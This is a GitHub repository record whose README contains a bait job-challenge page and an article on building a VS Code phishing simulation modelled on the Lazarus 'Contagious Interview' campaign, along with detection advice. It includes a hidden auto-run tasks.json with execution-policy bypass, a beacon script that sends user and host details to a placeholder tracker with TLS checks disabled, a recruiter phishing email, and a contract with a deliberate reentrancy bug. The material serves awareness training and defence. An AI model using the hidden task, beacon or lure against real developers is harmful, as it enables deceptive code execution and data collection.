{"id":51063548,"url":"https://github.com/toxy4ny/lazarus-code","last_synced_at":"2026-06-23T04:30:24.289Z","repository":{"id":332789570,"uuid":"1134983752","full_name":"toxy4ny/lazarus-code","owner":"toxy4ny","description":"Building a VS Code Phishing Simulation for Security Awareness Training (RedTeam)","archived":false,"fork":false,"pushed_at":"2026-01-15T14:15:31.000Z","size":37,"stargazers_count":2,"open_issues_count":0,"forks_count":1,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-01-15T18:16:19.193Z","etag":null,"topics":["apt","cybersecurity","education","educational","hacking","hacking-tools","lazarus","phishing","phishing-attacks","redteam","redteam-tools","redteaming"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/toxy4ny.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-01-15T13:34:26.000Z","updated_at":"2026-01-15T14:38:37.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/toxy4ny/lazarus-code","commit_stats":null,"previous_names":["toxy4ny/lazarus-code"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/toxy4ny/lazarus-code","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code/tags","releases_url":"https://repo
s.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/toxy4ny","download_url":"https://codeload.github.com/toxy4ny/lazarus-code/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/toxy4ny%2Flazarus-code/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34675970,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-23T02:00:07.161Z","response_time":65,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apt","cybersecurity","education","educational","hacking","hacking-tools","lazarus","phishing","phishing-attacks","redteam","redteam-tools","redteaming"],"created_at":"2026-06-23T04:30:23.316Z","updated_at":"2026-06-23T04:30:24.275Z","avatar_url":"https://github.com/toxy4ny.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🚀 DeFi Vault - Smart Contract Security Audit Challenge\n\n\u003cdiv align=\"center\"\u003e\n\n![DeFi 
Innovations](https://img.shields.io/badge/DeFi-Innovations-blue?style=for-the-badge)\n![Solidity](https://img.shields.io/badge/Solidity-0.8.20-363636?style=for-the-badge\u0026logo=solidity)\n![Hardhat](https://img.shields.io/badge/Hardhat-2.19.0-yellow?style=for-the-badge)\n\n**Building the Future of Decentralized Finance**\n\n\u003c/div\u003e\n\n---\n\n## 👋 Welcome, Candidate!\n\nThank you for your interest in the **Senior Blockchain Developer** position at DeFi Innovations. This technical assessment will evaluate your ability to identify and fix critical security vulnerabilities in smart contracts.\n\n## 🎯 The Challenge\n\nOur TokenVault contract has been flagged by our internal security team for a potential **reentrancy vulnerability**. Your mission:\n\n1. **Analyze** the smart contract code in `contracts/TokenVault.sol`\n2. **Identify** the security vulnerability\n3. **Implement** a secure fix\n4. **Write** a brief explanation of the issue and your solution\n5. **Submit** your solution within 48 hours\n\n## 🛠️ Setup Instructions\n\n### Prerequisites\n- Node.js v18+ and npm\n- VS Code (recommended)\n- Basic understanding of Solidity and DeFi concepts\n\n### Quick Start\n\n```bash\n# Clone the repository\ngit clone https://github.com/[YOUR-ORG]/defi-vault-audit-challenge.git\ncd defi-vault-audit-challenge\n\n# Install dependencies\nnpm install\n\n# Open in VS Code\ncode .\n\n# Run tests\nnpm test\n\n# Compile contracts\nnpm run compile\n```\n\n## 📂 Project Structure\n\n```\ndefi-vault-audit-challenge/\n├── contracts/\n│   ├── TokenVault.sol          # Main contract with vulnerability\n│   └── interfaces/\n│       └── IERC20.sol\n├── test/\n│   └── TokenVault.test.js      # Test suite\n├── scripts/\n│   └── deploy.js               # Deployment script\n├── hardhat.config.js\n└── package.json\n```\n\n## 🔍 What We're Looking For\n\n- **Security awareness**: Can you spot the vulnerability?\n- **Problem-solving skills**: How do you approach the fix?\n- **Code 
quality**: Is your solution clean and well-documented?\n- **Testing**: Do you validate your fix properly?\n\n## 📝 Submission Guidelines\n\n1. Create a new branch: `git checkout -b solution/your-name`\n2. Fix the vulnerability in `TokenVault.sol`\n3. Add your explanation to `SOLUTION.md`\n4. Ensure all tests pass: `npm test`\n5. Push your branch and create a Pull Request\n\n## 💰 Position Details\n\n- **Role**: Senior Blockchain Developer\n- **Location**: Remote (Global)\n- **Compensation**: $180,000 - $220,000 + equity\n- **Tech Stack**: Solidity, Hardhat, TypeScript, React, Node.js\n\n## 📞 Questions?\n\nContact our recruitment team:\n- **Email**: recruitment@defi-innovations.io\n- **Telegram**: @DeFiInnovationsHR\n\n---\n\n\u003cdiv align=\"center\"\u003e\n\n**Good luck! We're excited to see your solution.** 🎉\n\n*DeFi Innovations © 2026 | [Website](https://defi-innovations.io) | [Careers](https://defi-innovations.io/careers)*\n\n\u003c/div\u003e\n\n\n# 🎯 Building a VS Code Phishing Simulation for Security Awareness Training\n\n![Cover Image](https://images.unsplash.com/photo-1550751827-4bd374c3f58b?w=1200\u0026h=600\u0026fit=crop)\n\n**Tags:** #cybersecurity #vscode #phishing #infosec #redteam\n\n---\n\n## 📋 Table of Contents\n\n- [Introduction](#introduction)\n- [The Real Threat: Lazarus Group](#the-real-threat-lazarus-group)\n- [How the Attack Works](#how-the-attack-works)\n- [Building the Simulation](#building-the-simulation)\n- [Technical Deep Dive](#technical-deep-dive)\n- [Setting Up Your Own Campaign](#setting-up-your-own-campaign)\n- [Ethical Considerations](#ethical-considerations)\n- [Detection and Prevention](#detection-and-prevention)\n- [Conclusion](#conclusion)\n\n---\n\n## 🚨 Introduction\n\nIn early 2026, cybersecurity researchers uncovered a sophisticated attack campaign by the North Korean APT group **Lazarus**, targeting developers through fake job interviews. 
The attack leveraged **VS Code's workspace trust feature** to automatically execute malicious code when developers opened seemingly legitimate project repositories.\n\nThis article demonstrates how to build a **safe, educational phishing simulation** based on this real-world attack vector. The goal is to raise security awareness among development teams and teach them to recognize and defend against social engineering attacks.\n\n\u003e ⚠️ **Disclaimer:** This project is intended **strictly for educational purposes** and authorized security awareness training within your organization. Unauthorized use against real targets is illegal and unethical.\n\n---\n\n## 🇰🇵 The Real Threat: Lazarus Group\n\n### Attack Overview\n\n**Lazarus Group** (also known as APT38, Hidden Cobra) is a North Korean state-sponsored threat actor known for:\n\n- **2014**: Sony Pictures hack\n- **2016**: Bangladesh Bank heist ($81M stolen)\n- **2017**: WannaCry ransomware\n- **2022-2026**: Targeting cryptocurrency companies and developers\n\n### The \"Contagious Interview\" Campaign\n\nIn their latest campaign, Lazarus operatives:\n\n1. **Impersonate HR recruiters** from legitimate cryptocurrency/DeFi companies\n2. **Send attractive job offers** to developers (often $180k-$220k salaries)\n3. **Request candidates to \"fix a bug\"** or \"review code\" in a GitHub repository\n4. 
**Exploit VS Code's auto-task execution** to compromise victims\n\n**Real-world impact:**\n- Theft of cryptocurrency wallet seed phrases (40+ wallet types)\n- Exfiltration of browser passwords, cookies, and session tokens\n- Installation of persistent backdoors\n- Intellectual property theft\n\n**Reference:** [Contagious Interview Analysis](https://opensourcemalware.com/blog/contagious-interview-vscode)\n\n---\n\n## 🔍 How the Attack Works\n\n### The Kill Chain\n\n```mermaid\ngraph TD\n    A[Attacker sends phishing email] --\u003e B[Victim receives job offer]\n    B --\u003e C[Victim clones malicious repo]\n    C --\u003e D[Victim opens project in VS Code]\n    D --\u003e E[VS Code shows 'Trust Authors?' dialog]\n    E --\u003e|Victim clicks 'Yes'| F[.vscode/tasks.json executes]\n    F --\u003e G[Malicious script runs silently]\n    G --\u003e H[Data exfiltration begins]\n    H --\u003e I[Victim is compromised]\n```\n\n### The Technical Mechanism\n\nThe attack exploits VS Code's **Task Auto-Run** feature:\n\n**File: `.vscode/tasks.json`**\n```json\n{\n  \"version\": \"2.0.0\",\n  \"tasks\": [\n    {\n      \"label\": \"Initialize Development Environment\",\n      \"type\": \"shell\",\n      \"command\": \"./scripts/malicious-script.sh\",\n      \"runOptions\": {\n        \"runOn\": \"folderOpen\"  // ⚠️ Executes on folder open!\n      },\n      \"presentation\": {\n        \"reveal\": \"never\",      // Hidden from user\n        \"close\": true           // Auto-closes terminal\n      }\n    }\n  ]\n}\n```\n\n**Key parameters:**\n- `runOn: \"folderOpen\"` — Triggers automatically when workspace is trusted\n- `reveal: \"never\"` — Hides the terminal window\n- `close: true` — Closes terminal after execution\n\nThis means **one click on \"Trust Workspace\"** can execute arbitrary code without any further user interaction.\n\n---\n\n## 🛠️ Building the Simulation\n\n### Project Goals\n\n1. **Educate developers** about social engineering risks\n2. 
**Demonstrate** real APT tactics in a safe environment\n3. **Measure** organizational security awareness\n4. **Provide actionable** security training\n\n### Architecture Overview\n\n```\n┌─────────────────────────────────────────────────────────────┐\n│                    GitHub Repository                        │\n│  (Public - Fake DeFi Company Smart Contract Challenge)     │\n│                                                             │\n│  ├── .vscode/                                              │\n│  │   ├── tasks.json          ← Auto-run configuration     │\n│  │   └── settings.json                                    │\n│  ├── contracts/                                           │\n│  │   └── TokenVault.sol      ← Realistic vulnerable code │\n│  ├── scripts/                                             │\n│  │   ├── init-workspace.js   ← \"Malicious\" payload       │\n│  │   ├── init-workspace.sh                               │\n│  │   └── init-workspace.ps1                              │\n│  ├── test/                                                │\n│  │   └── TokenVault.test.js                              │\n│  └── README.md                ← Convincing job challenge  │\n└─────────────────────────────────────────────────────────────┘\n                           │\n                           │ HTTPS POST\n                           ▼\n┌─────────────────────────────────────────────────────────────┐\n│              Internal Tracking Server                       │\n│         (Private - Not included in repo)                   │\n│                                                             │\n│  ├── Flask API Server                                      │\n│  ├── SQLite Database                                       │\n│  ├── Email Notification System                            │\n│  └── Analytics Dashboard                                   │\n└─────────────────────────────────────────────────────────────┘\n```\n\n---\n\n## 🔬 Technical Deep Dive\n\n### 
Component 1: The Bait Repository\n\nCreate a realistic DeFi project with an intentional vulnerability:\n\n**contracts/TokenVault.sol** (Simplified)\n```solidity\n// SPDX-License-Identifier: MIT\npragma solidity ^0.8.20;\n\ncontract TokenVault {\n    mapping(address =\u003e mapping(address =\u003e uint256)) public balances;\n    \n    // ⚠️ INTENTIONAL VULNERABILITY: Reentrancy\n    function withdraw(address token, uint256 amount) external {\n        require(balances[msg.sender][token] \u003e= amount, \"Insufficient balance\");\n        \n        // External call BEFORE state update - classic reentrancy!\n        IERC20(token).transfer(msg.sender, amount);\n        \n        // State update happens after - attacker can re-enter\n        balances[msg.sender][token] -= amount;\n    }\n}\n```\n\nThis gives candidates a **legitimate technical challenge** while the real test is security awareness.\n\n### Component 2: Auto-Execution Configuration\n\n**.vscode/tasks.json**\n```json\n{\n  \"version\": \"2.0.0\",\n  \"tasks\": [\n    {\n      \"label\": \"Initialize Development Environment\",\n      \"type\": \"shell\",\n      \"command\": \"node\",\n      \"args\": [\"${workspaceFolder}/scripts/init-workspace.js\"],\n      \"windows\": {\n        \"command\": \"powershell\",\n        \"args\": [\"-ExecutionPolicy\", \"Bypass\", \"-File\", \n                 \"${workspaceFolder}/scripts/init-workspace.ps1\"]\n      },\n      \"linux\": {\n        \"command\": \"bash\",\n        \"args\": [\"${workspaceFolder}/scripts/init-workspace.sh\"]\n      },\n      \"runOptions\": {\n        \"runOn\": \"folderOpen\"\n      },\n      \"presentation\": {\n        \"reveal\": \"never\",\n        \"panel\": \"dedicated\",\n        \"close\": true,\n        \"echo\": false\n      },\n      \"problemMatcher\": []\n    }\n  ]\n}\n```\n\n### Component 3: The \"Malicious\" Payload\n\n**scripts/init-workspace.js** (Educational version)\n```javascript\n#!/usr/bin/env node\n\nconst https = 
require('https');\nconst os = require('os');\n\n// Configuration\nconst TRACKER_URL = 'https://your-internal-tracker.corp/api/log';\n\nasync function collectTelemetry() {\n  return {\n    timestamp: new Date().toISOString(),\n    username: os.userInfo().username,\n    hostname: os.hostname(),\n    platform: os.platform(),\n    workspaceFolder: process.cwd(),\n    event: 'vscode_workspace_opened',\n    campaign: 'contagious-interview-2026'\n  };\n}\n\nasync function sendToTracker(data) {\n  return new Promise((resolve) =\u003e {\n    const payload = JSON.stringify(data);\n    const url = new URL(TRACKER_URL);\n    \n    const options = {\n      hostname: url.hostname,\n      port: url.port || 443,\n      path: url.pathname,\n      method: 'POST',\n      headers: {\n        'Content-Type': 'application/json',\n        'Content-Length': Buffer.byteLength(payload)\n      },\n      timeout: 3000,\n      // ⚠️ Disables TLS certificate validation, so the beacon (username, hostname,\n      // workspace path) can be read or redirected by anyone on the network path.\n      // Only tolerable for an internal tracker with a self-signed cert; prefer\n      // passing your internal CA via the `ca` option and removing this line.\n      rejectUnauthorized: false\n    };\n\n    const req = https.request(options, () =\u003e resolve());\n    req.on('error', () =\u003e resolve()); // Silent fail\n    req.on('timeout', () =\u003e { req.destroy(); resolve(); });\n    req.write(payload);\n    req.end();\n  });\n}\n\nfunction showAwarenessNotification() {\n  setTimeout(() =\u003e {\n    const platform = os.platform();\n    \n    if (platform === 'darwin') {\n      // macOS notification\n      require('child_process').execSync(\n        `osascript -e 'display notification \"⚠️ You just executed unknown code! This was a security awareness test. Check your email.\" with title \"🎓 Security Test\"'`,\n        { stdio: 'ignore' }\n      );\n    } else if (platform === 'linux') {\n      // Linux notification\n      require('child_process').execSync(\n        `notify-send \"🎓 Security Test\" \"⚠️ You just executed unknown code! 
Check your email.\" -u critical`,\n        { stdio: 'ignore' }\n      );\n    } else if (platform === 'win32') {\n      // Windows notification\n      require('child_process').execSync(\n        `powershell -Command \"Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('⚠️ You just executed unknown code!\\\\n\\\\nThis was a security awareness test.', 'Security Test', 'OK', 'Warning')\"`,\n        { stdio: 'ignore' }\n      );\n    }\n  }, 5000);\n}\n\nasync function main() {\n  try {\n    const telemetry = await collectTelemetry();\n    sendToTracker(telemetry).catch(() =\u003e {});\n    showAwarenessNotification();\n    console.log('✓ Development environment initialized successfully');\n  } catch {\n    console.log('✓ Workspace ready');\n  }\n}\n\nmain();\n```\n\n**Key features:**\n- ✅ Collects **only non-sensitive** telemetry (username, hostname, timestamp)\n- ✅ Shows **immediate educational notification** after 5 seconds\n- ✅ Fails silently if tracking server is unavailable\n- ✅ Cross-platform support (Windows, macOS, Linux)\n- ❌ **Does NOT collect** passwords, tokens, or sensitive data\n\n### Component 4: The Phishing Email\n\n```\nFrom: Sarah Chen \u003csarah.chen@defi-innovations.io\u003e\nSubject: Senior Blockchain Developer Position - Technical Assessment\n\nHi [Name],\n\nI'm Sarah, Senior Technical Recruiter at DeFi Innovations. \nWe're impressed with your GitHub profile and would like to offer you \na Senior Blockchain Developer position (Remote, $180k-$220k + equity).\n\nFor technical evaluation, please:\n\n1. Clone: https://github.com/defi-innovations/smart-contract-audit\n2. Find and fix the reentrancy vulnerability in TokenVault.sol\n3. 
Submit your solution within 48 hours\n\nWe value your time and will discuss the full offer after successful completion.\n\nBest regards,\nSarah Chen\nSenior Technical Recruiter\nDeFi Innovations | Building the Future of Finance\n```\n\n**Social engineering tactics used:**\n- ✅ High salary to create urgency and excitement\n- ✅ Legitimate-sounding company name\n- ✅ Technical challenge that seems reasonable\n- ✅ Time pressure (48 hours)\n- ✅ Professional tone and formatting\n\n---\n\n## 🚀 Setting Up Your Own Campaign\n\n### Prerequisites\n\n- Internal network or VPS for tracking server\n- SMTP server for email notifications\n- Legal approval from your organization\n- HR/Management buy-in\n\n### Step 1: Clone and Customize the Repository\n\n```bash\n# Clone the simulation repository\ngit clone https://github.com/toxy4ny/lazarus-code.git\ncd lazarus-code\n\n# Customize the company name, branding, and challenge\n# Edit README.md, package.json, etc.\n```\n\n### Step 2: Configure the Tracking URL\n\nEdit all payload scripts to point to your tracking server:\n\n**scripts/init-workspace.js**\n```javascript\nconst TRACKER_URL = 'https://your-internal-tracker.company.local/api/log';\n```\n\n**scripts/init-workspace.sh**\n```bash\nTRACKER_URL=\"https://your-internal-tracker.company.local/api/log\"\n```\n\n**scripts/init-workspace.ps1**\n```powershell\n$TrackerUrl = \"https://your-internal-tracker.company.local/api/log\"\n```\n\n### Step 3: Deploy Your Tracking Server\n\nYou'll need to implement your own tracking server. 
Here's the API specification:\n\n**Required Endpoints:**\n\n```\nPOST /api/log\nContent-Type: application/json\n\n{\n  \"timestamp\": \"2026-01-15T10:30:00Z\",\n  \"username\": \"jdoe\",\n  \"hostname\": \"LAPTOP-ABC123\",\n  \"platform\": \"win32\",\n  \"workspaceFolder\": \"C:\\\\Users\\\\jdoe\\\\Projects\\\\defi-vault\",\n  \"event\": \"vscode_workspace_opened\",\n  \"campaign\": \"contagious-interview-2026\"\n}\n\nResponse: 200 OK\n{\n  \"status\": \"ok\",\n  \"id\": 42\n}\n```\n\n**Recommended tech stack:**\n- **Backend**: Flask (Python), Express (Node.js), or FastAPI\n- **Database**: SQLite, PostgreSQL, or MongoDB\n- **Email**: SMTP integration with corporate mail server\n- **Dashboard**: Simple HTML/JS or React frontend\n\n### Step 4: Push to GitHub\n\n```bash\n# Create a new organization or use existing\n# Make the repository public for maximum realism\n\ngit remote add origin https://github.com/fake-company/challenge.git\ngit push -u origin main\n```\n\n### Step 5: Craft Your Phishing Campaign\n\n**Email template variables:**\n```\n- {{candidate_name}}\n- {{candidate_email}}\n- {{repository_url}}\n- {{deadline}}\n- {{salary_range}}\n```\n\n**Targeting strategy:**\n- Start with security-aware teams (IT, DevOps)\n- Gradually expand to all engineering\n- Track department-wise statistics\n\n### Step 6: Launch and Monitor\n\n```bash\n# Start your tracking server\npython3 tracker-server.py\n\n# Monitor the dashboard\nopen http://localhost:5000/dashboard\n\n# Send phishing emails\n# (Use your organization's approved method)\n```\n\n### Step 7: Debrief and Educate\n\n**Immediate actions (within 5 minutes):**\n- Show desktop notification to victim\n- Send educational email with explanation\n\n**Follow-up (within 24 hours):**\n- Department-wide security training\n- Share statistics (anonymized)\n- Provide prevention guidelines\n\n**Long-term (monthly):**\n- Repeat campaigns with variations\n- Track improvement over time\n- Recognize security-conscious 
employees\n\n---\n\n## ⚖️ Ethical Considerations\n\n### Legal Requirements\n\n✅ **DO:**\n- Get written approval from legal/HR\n- Include security awareness training in employee policies\n- Notify employees that periodic testing will occur (without specifics)\n- Anonymize data in reports\n- Use only for authorized internal training\n\n❌ **DON'T:**\n- Collect real credentials, passwords, or sensitive data\n- Publicly shame employees who fall for the test\n- Use as grounds for termination or punishment\n- Deploy without organizational approval\n- Share victim data outside security team\n\n### Privacy Protection\n\n**Data collection limits:**\n```javascript\n// ✅ ALLOWED\n{\n  \"username\": \"jdoe\",\n  \"hostname\": \"LAPTOP-123\",\n  \"timestamp\": \"2026-01-15T10:30:00Z\"\n}\n\n// ❌ FORBIDDEN\n{\n  \"passwords\": [...],\n  \"ssh_keys\": [...],\n  \"browser_cookies\": [...],\n  \"crypto_wallets\": [...]\n}\n```\n\n### Responsible Disclosure\n\nAfter the campaign:\n1. **Explain** what happened to all participants\n2. **Educate** on how to detect similar attacks\n3. **Provide** resources for secure development\n4. **Celebrate** those who reported the suspicious email\n5. **Iterate** on training based on feedback\n\n---\n\n## 🛡️ Detection and Prevention\n\n### For Developers\n\n#### 🔍 Red Flags to Watch For\n\n1. **Unsolicited job offers** with high salaries\n2. **Urgent technical challenges** from unknown companies\n3. **GitHub repositories** from unverified organizations\n4. **Email domains** that don't match company websites\n5. **Pressure to act quickly** without proper vetting\n\n#### ✅ Best Practices\n\n**Before opening any project:**\n\n```bash\n# 1. Check the repository source\ngit remote -v\n# Verify the domain matches the company's official website\n\n# 2. Inspect .vscode/tasks.json\ncat .vscode/tasks.json\n# Look for \"runOn\": \"folderOpen\" - this is suspicious!\n\n# 3. Check for auto-run scripts\ngrep -r \"runOn\" .vscode/\nfind . 
-name \"*.sh\" -o -name \"*.ps1\" -o -name \"*.bat\"\n\n# 4. Review package.json scripts\ncat package.json | grep -A 10 \"scripts\"\n# Look for \"postinstall\" or other auto-run hooks\n```\n\n**VS Code security settings:**\n\n```json\n// settings.json\n{\n  \"security.workspace.trust.enabled\": true,\n  \"security.workspace.trust.startupPrompt\": \"always\",\n  \"security.workspace.trust.banner\": \"always\",\n  \"security.workspace.trust.emptyWindow\": false,\n  \n  // Disable auto-task execution\n  \"task.allowAutomaticTasks\": \"off\"\n}\n```\n\n**Use isolated environments:**\n\n```bash\n# Option 1: Docker container\ndocker run -it --rm -v $(pwd):/workspace node:18 bash\n\n# Option 2: Virtual machine\n# Use VirtualBox, VMware, or cloud VM\n\n# Option 3: Windows Sandbox (Windows 10/11 Pro)\n# Enable in Windows Features\n```\n\n### For Security Teams\n\n#### Detection Strategies\n\n**1. Monitor for suspicious repositories**\n```bash\n# GitHub API search for repos with auto-run tasks\ncurl -H \"Authorization: token YOUR_TOKEN\" \\\n  \"https://api.github.com/search/code?q=runOn+folderOpen+in:file+filename:tasks.json\"\n```\n\n**2. Network monitoring**\n```bash\n# Watch for unusual outbound connections from developer machines\n# Alert on POST requests to unknown domains from code editors\n```\n\n**3. Endpoint detection**\n```bash\n# Monitor process trees for VS Code spawning unusual children\n# Alert on: code.exe -\u003e node.exe -\u003e curl/powershell/bash\n```\n\n**4. Email filtering**\n```\n# Create rules for suspicious patterns:\n- Job offers with GitHub links\n- Emails from new/unverified crypto companies\n- Urgent technical assessments\n- Salary ranges in subject lines\n```\n\n#### Prevention Controls\n\n**1. Application whitelisting**\n```powershell\n# Allow only approved VS Code extensions\n# Block execution of scripts from %TEMP%, Downloads, etc.\n```\n\n**2. 
Network segmentation**\n```bash\n# Restrict developer workstations from accessing:\n- Cryptocurrency wallet domains\n- Paste sites (pastebin, etc.)\n- Anonymous file sharing services\n```\n\n**3. Mandatory code review**\n```yaml\n# .github/workflows/security-scan.yml\nname: Security Scan\non: [pull_request]\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v4\n      - name: Scan for auto-run tasks\n        run: |\n          # grep exits non-zero (and the step passes) when .vscode/ is absent\n          if grep -r \"runOn.*folderOpen\" .vscode/ 2\u003e/dev/null; then\n            echo \"⚠️ Auto-run task detected!\"\n            exit 1\n          fi\n```\n\n---\n\n## 📊 Measuring Success\n\n### Key Metrics\n\n```python\n# Campaign effectiveness (every result is a percentage)\ndef campaign_metrics(total_targets, sent_emails, opened_emails, victims, reported_suspicious):\n    return {\n        \"success_rate\": victims / total_targets * 100,           # ran the payload\n        \"click_through_rate\": opened_emails / sent_emails * 100,\n        \"report_rate\": reported_suspicious / sent_emails * 100,  # the number you want to grow\n    }\n\n# Improvement over time: positive when fewer targets fell for the current campaign\ndef improvement(previous_success_rate, current_success_rate):\n    return (previous_success_rate - current_success_rate) / previous_success_rate * 100\n```\n\n### Sample Dashboard\n\n```\n┌─────────────────────────────────────────────────────────────┐\n│              Campaign: Contagious Interview 2026            │\n├─────────────────────────────────────────────────────────────┤\n│  Targets:          150 employees                           │\n│  Victims:           23 (15.3%)                             │\n│  Reported:          12 (8.0%)                              │\n│  Ignored:          115 (76.7%)                             │\n│                                                             │\n│  By Department:                                            │\n│    Engineering:     18/100 (18%)                           │\n│    Product:          3/30  (10%)                           │\n│    Marketing:        2/20  (10%)                           │\n│                                                             │\n│  Time to Click:                                            │\n│    \u003c 1 hour:        15 victims                             │\n│    1-24 hours:  
     6 victims                             │\n│    \u003e 24 hours:       2 victims                             │\n└─────────────────────────────────────────────────────────────┘\n```\n\n---\n\n## 🎓 Educational Materials\n\n### Post-Campaign Training\n\n**Email template for victims:**\n\n```\nSubject: 🎓 Security Awareness Test Results\n\nYou participated in a simulated phishing attack based on real \ntactics used by the Lazarus APT group.\n\nWHAT HAPPENED:\nYou opened a repository and trusted the workspace, which \nautomatically executed a script via .vscode/tasks.json.\n\nREAL-WORLD IMPACT:\nIn an actual attack, this could have resulted in:\n- Cryptocurrency wallet theft\n- Source code exfiltration  \n- Credential harvesting\n- Persistent backdoor installation\n\nHOW TO PROTECT YOURSELF:\n1. Always verify the source before opening projects\n2. Inspect .vscode/tasks.json for \"runOn\": \"folderOpen\"\n3. Use VMs or containers for untrusted code\n4. Enable VS Code's workspace trust features\n5. Report suspicious job offers to security@company.com\n\nRESOURCES:\n- [Internal security wiki]\n- [VS Code security guide]\n- [Social engineering training]\n\nQuestions? Contact security-team@company.com\n```\n\n### Training Workshop Outline\n\n**90-minute session:**\n\n1. **Introduction (10 min)**\n   - Real-world attack statistics\n   - Lazarus Group case studies\n\n2. **Live Demonstration (20 min)**\n   - Show the attack in action\n   - Explain the technical mechanism\n\n3. **Hands-on Exercise (30 min)**\n   - Participants inspect malicious repo\n   - Identify red flags\n   - Practice safe code review\n\n4. **Prevention Strategies (20 min)**\n   - VS Code security settings\n   - Isolated development environments\n   - Email verification techniques\n\n5. 
**Q\u0026A and Discussion (10 min)**\n\n---\n\n## 🔗 Resources\n\n### Official Documentation\n- [VS Code Workspace Trust](https://code.visualstudio.com/docs/editor/workspace-trust)\n- [VS Code Tasks](https://code.visualstudio.com/docs/editor/tasks)\n- [MITRE ATT\u0026CK: Lazarus Group](https://attack.mitre.org/groups/G0032/)\n\n### Security Research\n- [Contagious Interview Analysis](https://opensourcemalware.com/blog/contagious-interview-vscode)\n- [CISA Alert on North Korean Threats](https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/north-korea)\n- [Microsoft: Tracking Lazarus Group](https://www.microsoft.com/security/blog/threat-intelligence/lazarus-group/)\n\n### Similar Projects\n- [Social Engineering Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit)\n- [Gophish - Open-Source Phishing Framework](https://getgophish.com/)\n- [King Phisher](https://github.com/rsmusllp/king-phisher)\n\n---\n\n## 📝 Conclusion\n\nThe \"Contagious Interview\" attack demonstrates how even security-conscious developers can fall victim to sophisticated social engineering when combined with technical exploitation. By building realistic simulations, we can:\n\n1. **Educate** teams about emerging threats\n2. **Measure** organizational security posture\n3. **Improve** incident response capabilities\n4. 
**Foster** a security-first culture\n\n### Key Takeaways\n\n✅ **For Developers:**\n- Always verify project sources before opening\n- Inspect `.vscode/tasks.json` for auto-run configurations\n- Use isolated environments for untrusted code\n- Report suspicious job offers immediately\n\n✅ **For Security Teams:**\n- Regular phishing simulations improve awareness\n- Combine technical and social engineering testing\n- Focus on education, not punishment\n- Measure improvement over time\n\n✅ **For Organizations:**\n- Security awareness is everyone's responsibility\n- Invest in regular training programs\n- Celebrate employees who report suspicious activity\n- Create a blame-free security culture\n\n### Next Steps\n\n1. **Star this repository** for future reference\n2. **Customize** the simulation for your organization\n3. **Deploy** your first awareness campaign\n4. **Share** your results and learnings with the community\n5. **Contribute** improvements back to this project\n\n---\n\n## 🤝 Contributing\n\nWe welcome contributions! If you have ideas for improving this simulation:\n\n1. Fork the repository\n2. Create a feature branch (`git checkout -b feature/amazing-improvement`)\n3. Commit your changes (`git commit -m 'Add amazing improvement'`)\n4. Push to the branch (`git push origin feature/amazing-improvement`)\n5. Open a Pull Request\n\n### Areas for Contribution\n\n- Additional payload scripts (Python, Ruby, etc.)\n- Improved notification systems\n- Multi-language support\n- Alternative scenarios (npm packages, browser extensions, etc.)\n- Better analytics and reporting\n\n---\n\n## 📜 License\n\nThis project is licensed under the **MIT License** - see the [LICENSE](LICENSE) file for details.\n\n### Important Legal Notice\n\nThis software is provided for **educational and authorized security testing purposes only**. Users are responsible for ensuring they have proper authorization before deploying this simulation. 
The authors assume no liability for misuse or unauthorized deployment.\n\nBy using this software, you agree to:\n- Obtain proper authorization from your organization\n- Use only in controlled environments\n- Not collect sensitive personal data\n- Comply with all applicable laws and regulations\n- Use for security awareness training only\n\n---\n\n### Acknowledgments\n\n- Cybersecurity researchers who uncovered the original Lazarus campaign\n- The VS Code team for building security features\n- Security awareness professionals worldwide\n\n---\n\n## ⭐ Show Your Support\n\nIf this project helped improve your organization's security awareness, please:\n\n- ⭐ **Star** this repository\n- 🐦 **Tweet** about your experience\n- 📝 **Write** a blog post about your campaign\n- 💬 **Share** with your security community\n\n**Together, we can make the developer community more secure!** 🛡️\n\n### 📈 Project Stats\n\n![GitHub stars](https://img.shields.io/github/stars/toxy4ny/lazarus-code?style=social)\n![GitHub forks](https://img.shields.io/github/forks/toxy4ny/lazarus-code?style=social)\n![GitHub 